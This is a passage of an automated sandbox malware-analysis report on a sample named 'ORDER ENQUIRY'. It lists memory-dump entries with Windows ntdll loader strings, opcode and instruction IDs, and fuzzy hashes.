                                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01B282E8
                                                                                                                                                                          • Failed to reallocate the system dirs string !, xrefs: 01B282D7
                                                                                                                                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 01B282DE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                          • API String ID: 0-1783798831
                                                                                                                                                                          • Opcode ID: 1b6a48db48aab8b8e2624d8b0c3cdee1ff43c005b1f5bce98402371df8edd4a4
                                                                                                                                                                          • Instruction ID: a33b867d0d027ae165365d7acebc91489b948e86febfadba0cb2c64a371fd8c8
                                                                                                                                                                          • Opcode Fuzzy Hash: 1b6a48db48aab8b8e2624d8b0c3cdee1ff43c005b1f5bce98402371df8edd4a4
                                                                                                                                                                          • Instruction Fuzzy Hash: 6241F3B1984311BBC720EB68DD45B9B7BE8FF54760F49492AF949D3254E770D800CB91
                                                                                                                                                                          Strings
                                                                                                                                                                          • @, xrefs: 01B6C1F1
                                                                                                                                                                          • PreferredUILanguages, xrefs: 01B6C212
                                                                                                                                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01B6C1C5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                                          • API String ID: 0-2968386058
                                                                                                                                                                          • Opcode ID: 52695df924a7838dc2bff9203519b85092cacdd056a6be6cde2f59621f5153b9
                                                                                                                                                                          • Instruction ID: 67df4ed1db98b4cfddfbe3505c782b7ead59e9f34df87647c0a3a765782cfce7
                                                                                                                                                                          • Opcode Fuzzy Hash: 52695df924a7838dc2bff9203519b85092cacdd056a6be6cde2f59621f5153b9
                                                                                                                                                                          • Instruction Fuzzy Hash: 75415271E0020AEBDF15DED8C951FEEBBBCEB24704F1441AAEA49B7250D7789A44CB50
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                                          • API String ID: 0-1373925480
                                                                                                                                                                          • Opcode ID: 9f22f129c211fb31b4caaf4cd10303c562f8394fc29f300bf9d6b99db3f48023
                                                                                                                                                                          • Instruction ID: 44e27734749fe6e7cfbac87a7a915515b53a6244fd90190f0a43c8759b9c6237
                                                                                                                                                                          • Opcode Fuzzy Hash: 9f22f129c211fb31b4caaf4cd10303c562f8394fc29f300bf9d6b99db3f48023
                                                                                                                                                                          • Instruction Fuzzy Hash: 71414371A106888BEB2ADFE9C940BADBBB8FF55740F14849AD901FB381DB349900CB10
                                                                                                                                                                          Strings
                                                                                                                                                                          • LdrpCheckRedirection, xrefs: 01B3488F
                                                                                                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 01B34899
                                                                                                                                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01B34888
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                          • API String ID: 0-3154609507
                                                                                                                                                                          • Opcode ID: b3575554843e572dd4922ca74fa334ba032654a01649ad71cdac046e6cec0c22
                                                                                                                                                                          • Instruction ID: 1af5537f88b7af45a9fd95d13233037048e90c9377a357aedc1a46d748584418
                                                                                                                                                                          • Opcode Fuzzy Hash: b3575554843e572dd4922ca74fa334ba032654a01649ad71cdac046e6cec0c22
                                                                                                                                                                          • Instruction Fuzzy Hash: C541AF32A15651DFCB2ACE6DD840A26BBE4FFC9B50B0506E9ED5897351E730E820CB91
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                          • API String ID: 0-2558761708
                                                                                                                                                                          • Opcode ID: e6285182c403464b77eefeea2cd7bf183c5d7e1576d5a85f3616227ca7ddd7b9
                                                                                                                                                                          • Instruction ID: 77dbeb7ace8c865e2f090ed483a845c6b1366af18daee18e662520415b3d71a4
                                                                                                                                                                          • Opcode Fuzzy Hash: e6285182c403464b77eefeea2cd7bf183c5d7e1576d5a85f3616227ca7ddd7b9
                                                                                                                                                                          • Instruction Fuzzy Hash: 2A11DC35394142DFDB2DDB28C551B6AB3A4EF82A16FA981ADF406CF259DB30E880C750
                                                                                                                                                                          Strings
                                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01B32104
                                                                                                                                                                          • LdrpInitializationFailure, xrefs: 01B320FA
                                                                                                                                                                          • Process initialization failed with status 0x%08lx, xrefs: 01B320F3
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                          • API String ID: 0-2986994758
                                                                                                                                                                          • Opcode ID: 90ad50d0c5b30be6b46d8ab6db99210b7bd73be6a5a0bb2058bb8203aa5af7fd
                                                                                                                                                                          • Instruction ID: 85690d33586001df9651dcf7d51095d221f990d78205609d844d87a294657cda
                                                                                                                                                                          • Opcode Fuzzy Hash: 90ad50d0c5b30be6b46d8ab6db99210b7bd73be6a5a0bb2058bb8203aa5af7fd
                                                                                                                                                                          • Instruction Fuzzy Hash: BAF0FC35640308BBEB28E64DCD43F9A7BA8FB80B54F5400D9F7047B285D3B0A550C691
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                                          • String ID: #%u
                                                                                                                                                                          • API String ID: 48624451-232158463
                                                                                                                                                                          • Opcode ID: 60f3d2b382652e67c4582602607822ee9eeddab04fce53395264b22eb2cdb167
                                                                                                                                                                          • Instruction ID: 6aee56ad6db044095abc5a92833da0f6f332cbc69b65c7417cef53b738e35f23
                                                                                                                                                                          • Opcode Fuzzy Hash: 60f3d2b382652e67c4582602607822ee9eeddab04fce53395264b22eb2cdb167
                                                                                                                                                                          • Instruction Fuzzy Hash: 02714771A0014A9FDF05DFA8CA90BAEBBF8FF18704F154069E905E7251EB34AD05CBA0
                                                                                                                                                                          Strings
                                                                                                                                                                          • LdrResSearchResource Exit, xrefs: 01ABAA25
                                                                                                                                                                          • LdrResSearchResource Enter, xrefs: 01ABAA13
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                                                          • API String ID: 0-4066393604
                                                                                                                                                                          • Opcode ID: a2ab6282b4ee6890db503eb9da958e753d4d81d9e579203888e7135e98144e63
                                                                                                                                                                          • Instruction ID: 1f034896effe8e5120cd10680803ca6408d6a87cf3c97c935035428e0dcfc68a
                                                                                                                                                                          • Opcode Fuzzy Hash: a2ab6282b4ee6890db503eb9da958e753d4d81d9e579203888e7135e98144e63
                                                                                                                                                                          • Instruction Fuzzy Hash: 79E19171E00249AFEF26DF99C980BEEBBB9FF08310F1545A9E911E7256E7349940CB50
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: `$`
                                                                                                                                                                          • API String ID: 0-197956300
                                                                                                                                                                          • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                                          • Instruction ID: 6e97508afdc57923ed04c18b26f710728aeaa9e395e5eaa5a94c387096fa0614
                                                                                                                                                                          • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                                          • Instruction Fuzzy Hash: 52C1BD312043429BEB69CF28C845B6FBBE5EFC4718F084A6DF6A68B290D775D505CB81
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID: Legacy$UEFI
                                                                                                                                                                          • API String ID: 2994545307-634100481
                                                                                                                                                                          • Opcode ID: 3e155582bcc82b99fb391b728056ae5fd05f5660059737f860d8ccd03ada295f
                                                                                                                                                                          • Instruction ID: 7663a6fa4c8756ff029f93d75ae1c8d2d8adb8833dcc32cdada91cf447697aa4
                                                                                                                                                                          • Opcode Fuzzy Hash: 3e155582bcc82b99fb391b728056ae5fd05f5660059737f860d8ccd03ada295f
                                                                                                                                                                          • Instruction Fuzzy Hash: E5617E71E003199FDB18DFAAC940BAEBBB5FB48700F1441ADE649EB291D771E944CB50
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: @$MUI
                                                                                                                                                                          • API String ID: 0-17815947
                                                                                                                                                                          • Opcode ID: 5030f01582da94b561c7470759abda80f2ccf24b789a07810a3b60ec0acb1a8f
                                                                                                                                                                          • Instruction ID: 056efa094ad1aaff0c5585a69b5f50a8e42ebe024357b501e6cb34c2043a0a7c
                                                                                                                                                                          • Opcode Fuzzy Hash: 5030f01582da94b561c7470759abda80f2ccf24b789a07810a3b60ec0acb1a8f
                                                                                                                                                                          • Instruction Fuzzy Hash: 43512771E0021DAEDF15DFE9DD84BEEBBB8EB44754F10056AEA11B7280E7309945CB60
                                                                                                                                                                          Strings
                                                                                                                                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 01AB063D
                                                                                                                                                                          • kLsE, xrefs: 01AB0540
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                                          • API String ID: 0-2547482624
                                                                                                                                                                          • Opcode ID: 81328cf1f0553a173f0e1250d57b4f2f1038dad0710185c67c7130aa610540d4
                                                                                                                                                                          • Instruction ID: 4a71bdf217870fc0baf8fca9b66f44e8912117a29600ea5009009893c2fa7047
                                                                                                                                                                          • Opcode Fuzzy Hash: 81328cf1f0553a173f0e1250d57b4f2f1038dad0710185c67c7130aa610540d4
                                                                                                                                                                          • Instruction Fuzzy Hash: A0519D715047829BD724EF78C6806E7BBF8AF84304F14893EF69A87642E770E545CB91
                                                                                                                                                                          Strings
                                                                                                                                                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 01ABA2FB
                                                                                                                                                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 01ABA309
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                                          • API String ID: 0-2876891731
                                                                                                                                                                          • Opcode ID: acc792594d0aa02195cc2ba32a06e77cda9c261de1f587ba0e7bee7e8834caa3
                                                                                                                                                                          • Instruction ID: fb7ea574f9c737fa09a87f272252c4be9d436976c0fae23342fe50ea42e75579
                                                                                                                                                                          • Opcode Fuzzy Hash: acc792594d0aa02195cc2ba32a06e77cda9c261de1f587ba0e7bee7e8834caa3
                                                                                                                                                                          • Instruction Fuzzy Hash: 9841D234A05689DBDB15DF5DC480BAE7BB8FF84700F2580E9E905DB296E375D900CB50
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID: Cleanup Group$Threadpool!
                                                                                                                                                                          • API String ID: 2994545307-4008356553
                                                                                                                                                                          • Opcode ID: f178a53c8508b6396849ce7e6a3b94076d69dda2c4e7c207b0c04e25b6e263bc
                                                                                                                                                                          • Instruction ID: 6121b32a477be357b93c3e5d798290aa0d66ee298b6ef4751f2491e841b02099
                                                                                                                                                                          • Opcode Fuzzy Hash: f178a53c8508b6396849ce7e6a3b94076d69dda2c4e7c207b0c04e25b6e263bc
                                                                                                                                                                          • Instruction Fuzzy Hash: 5401A9B2640700AFD321DF28CE4AB2677E8F785B25F058979F658C7190E334E804CB46
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: MUI
                                                                                                                                                                          • API String ID: 0-1339004836
                                                                                                                                                                          • Opcode ID: f921c04a401cc5712fcb9e7b91a5590e75aaa07f9f6bb08e7e8d1ec0211b2867
                                                                                                                                                                          • Instruction ID: 853f456953d74053db2618e5837c3caaf7e14686ec99ca19febfba5ea623c67b
                                                                                                                                                                          • Opcode Fuzzy Hash: f921c04a401cc5712fcb9e7b91a5590e75aaa07f9f6bb08e7e8d1ec0211b2867
                                                                                                                                                                          • Instruction Fuzzy Hash: 63828D75E002988FEB25CFA9C9C0BEDBBB9BF44324F148169E919AB356D7309D41CB50
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 0-3916222277
                                                                                                                                                                          • Opcode ID: 7ece775d15b298878a19b9c4d69e59f355edc4056cee0a0beee78dd6d7888899
                                                                                                                                                                          • Instruction ID: 290f105b2dd9f4d5980355d700ae51992a7037ca2bdcee7a3d247893205ec476
                                                                                                                                                                          • Opcode Fuzzy Hash: 7ece775d15b298878a19b9c4d69e59f355edc4056cee0a0beee78dd6d7888899
                                                                                                                                                                          • Instruction Fuzzy Hash: F19181B1A00619BFEB25DB94CD85FEE7BB8EF58B50F114065F601AB190D774AD04CBA0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 0-3916222277
                                                                                                                                                                          • Opcode ID: b03ab8b7c5d60be968e526fda11a0f6820a25845f858e80086907414e8c00075
                                                                                                                                                                          • Instruction ID: d3b7c1d3ccba0d3791ed275e13c7d89bc1a9e26203e6462c6c8f8da0dedaf25d
                                                                                                                                                                          • Opcode Fuzzy Hash: b03ab8b7c5d60be968e526fda11a0f6820a25845f858e80086907414e8c00075
                                                                                                                                                                          • Instruction Fuzzy Hash: E091BE32900609AFDF2AABA5DD84FAFBBB9EF45780F000069F905A7251DB35DA01CB50
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: GlobalTags
                                                                                                                                                                          • API String ID: 0-1106856819
                                                                                                                                                                          • Opcode ID: 504621e23c56135cf3f02c1610eb4bb4d4ee1317873551e531f762a6467d2213
                                                                                                                                                                          • Instruction ID: cf355e40838f92b6b5725c4eac228a9e2ba2c0c6e9663231c863dae8c0ea4e74
                                                                                                                                                                          • Opcode Fuzzy Hash: 504621e23c56135cf3f02c1610eb4bb4d4ee1317873551e531f762a6467d2213
                                                                                                                                                                          • Instruction Fuzzy Hash: 24718EB5E0022ACFDF28CF9CD5806ADBBB1FF58700F1481AAED09AB251E7719845CB50
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: .mui
                                                                                                                                                                          • API String ID: 0-1199573805
                                                                                                                                                                          • Opcode ID: aaf5c5ec8ecf414237bf31c14109aada8171188eedce0b8f459fe8f23da7cd4f
                                                                                                                                                                          • Instruction ID: 1cfb9b86cb72b7793fcc9fbd9cc84732af81385c3d0d81397c21a0048c43ebfc
                                                                                                                                                                          • Opcode Fuzzy Hash: aaf5c5ec8ecf414237bf31c14109aada8171188eedce0b8f459fe8f23da7cd4f
                                                                                                                                                                          • Instruction Fuzzy Hash: F0519472D0022A9BDF99DFA9D940BEEBBB4EF05B10F054169EE11B7240E7349841CBE4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: EXT-
                                                                                                                                                                          • API String ID: 0-1948896318
                                                                                                                                                                          • Opcode ID: 82645b022126ec4c2c07a796354f2828102e058c52f91035212864d173748381
                                                                                                                                                                          • Instruction ID: 7c5ba8011cfc51f20db51e287807b0cb4968f257a4eeed152e32e26045a57afd
                                                                                                                                                                          • Opcode Fuzzy Hash: 82645b022126ec4c2c07a796354f2828102e058c52f91035212864d173748381
                                                                                                                                                                          • Instruction Fuzzy Hash: 7C418272608342AFD721DB75C940B6FBBE8AF88B14F44092DFA84E7140EB74D908C796
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: BinaryHash
                                                                                                                                                                          • API String ID: 0-2202222882
                                                                                                                                                                          • Opcode ID: 7b96f5b0dba8ed624fadc4321c0916d5533e8b9a336c8eb214d924bf9de7a443
                                                                                                                                                                          • Instruction ID: dd671d8eaed712fc8b1ce34c2f3bedfec897ea831a58fdf2fc16195dcb8fa81f
                                                                                                                                                                          • Opcode Fuzzy Hash: 7b96f5b0dba8ed624fadc4321c0916d5533e8b9a336c8eb214d924bf9de7a443
                                                                                                                                                                          • Instruction Fuzzy Hash: 8B4146B1D0052DAADF25DA50DD84FEEBB7CAB44714F0085D5E708AB140DB709E498F95
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: #
                                                                                                                                                                          • API String ID: 0-1885708031
                                                                                                                                                                          • Opcode ID: 89371650078041977960dda71e4157f19dd4a1b8d4f3b5ac71676da5797b444c
                                                                                                                                                                          • Instruction ID: bb1f511f699b0714348da175f92851e8826c9309b6b4365bd780e5922e0682a3
                                                                                                                                                                          • Opcode Fuzzy Hash: 89371650078041977960dda71e4157f19dd4a1b8d4f3b5ac71676da5797b444c
                                                                                                                                                                          • Instruction Fuzzy Hash: B5311631E007199BEB26CF69C850BAE7BA8DF06704F1480A8E941AB282D775EC45DB54
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: BinaryName
                                                                                                                                                                          • API String ID: 0-215506332
                                                                                                                                                                          • Opcode ID: 1ffeae8ea3efd022c31a88d5030e6295cb404496f96d540a329ca9b048c3b7a4
                                                                                                                                                                          • Instruction ID: c618241d8e903851952b8f8d22ed2a2e747ce406d1053d1f4d0685846912b770
                                                                                                                                                                          • Opcode Fuzzy Hash: 1ffeae8ea3efd022c31a88d5030e6295cb404496f96d540a329ca9b048c3b7a4
                                                                                                                                                                          • Instruction Fuzzy Hash: EE310536900529AFEB19DA58C959E6FBF74EF80760F0141A9EA09E7250D7309E08DBE0
                                                                                                                                                                          Strings
                                                                                                                                                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 01B3895E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                                                          • API String ID: 0-702105204
                                                                                                                                                                          • Opcode ID: a15f5d61a7fc24d3f5f53a5d46a763df804da64a565215944c337c664187e250
                                                                                                                                                                          • Instruction ID: f1878b856043eebcb4b664f5622951dc707c6d323c72e09293f1fcb338c88c71
                                                                                                                                                                          • Opcode Fuzzy Hash: a15f5d61a7fc24d3f5f53a5d46a763df804da64a565215944c337c664187e250
                                                                                                                                                                          • Instruction Fuzzy Hash: B9012632204305AFEB3D6F5ADDC4AAA7B75EFC5254B4423ACF64217152CB20B8A1C793
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: d964e084fc78d7a6b7423f6a74648e87f844abbdaf6438b4b8893264f1438282
                                                                                                                                                                          • Instruction ID: 2bde5f75e46be9f144ffba8a8e598cfe2f54146bbd38049a7424cf75cc12c2ec
                                                                                                                                                                          • Opcode Fuzzy Hash: d964e084fc78d7a6b7423f6a74648e87f844abbdaf6438b4b8893264f1438282
                                                                                                                                                                          • Instruction Fuzzy Hash: 3042C335609341DBEB69CF68C890B6BBBE5EF88340F0809ADFE9297250D771D845CB52
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: cb837132734269a79cbab6135eec80fd9cace0513b720b5ec5615a08df2763bb
                                                                                                                                                                          • Instruction ID: b220dc440b9acd48fcaeab0eb7d8497c61cb083067492fc0a8df9dd504f5807d
                                                                                                                                                                          • Opcode Fuzzy Hash: cb837132734269a79cbab6135eec80fd9cace0513b720b5ec5615a08df2763bb
